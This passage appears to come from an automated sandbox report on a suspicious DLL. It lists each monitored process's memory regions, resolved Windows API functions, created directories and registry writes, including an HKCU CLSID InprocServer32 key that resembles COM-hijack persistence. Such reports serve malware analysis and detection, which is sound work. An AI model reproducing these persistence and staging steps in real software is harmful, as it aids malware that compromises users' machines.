| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (108)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
15 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
9 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
6 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:26 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 96112 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #33: gorctexxzx.exe
129
0
| Information | Value |
|---|---|
| ID | #33 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=InstallW /fn_args="Install" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:33, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:56 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbf0 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
BF4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x00187fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x00190fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x002affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x0035ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x0049ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004a0000 | 0x004a0000 | 0x005a0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x005effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000005f0000 | 0x005f0000 | 0x0079ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Registry (10)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Classes\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InprocServer32 | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Classes\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InprocServer32 | data = Install, size = 16, type = REG_SZ |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 3600, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, size = 2, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plgv, size = 88, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Plpv, size = 92, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISFValue, size = 0, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISRValue, size = 0, type = REG_BINARY |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:26 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 96190 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 | |
| Get Info | type = Operating System |
|
1 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #34: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #34 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=AddAtomS /fn_args="DefaultInstall" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:33, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:56 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbfc |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C00
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x001affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x002fffff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x00300000 | 0x00366fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000370000 | 0x00370000 | 0x00437fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000440000 | 0x00440000 | 0x004bffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000004e0000 | 0x004e0000 | 0x004effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004f0000 | 0x004f0000 | 0x005f0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0076ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
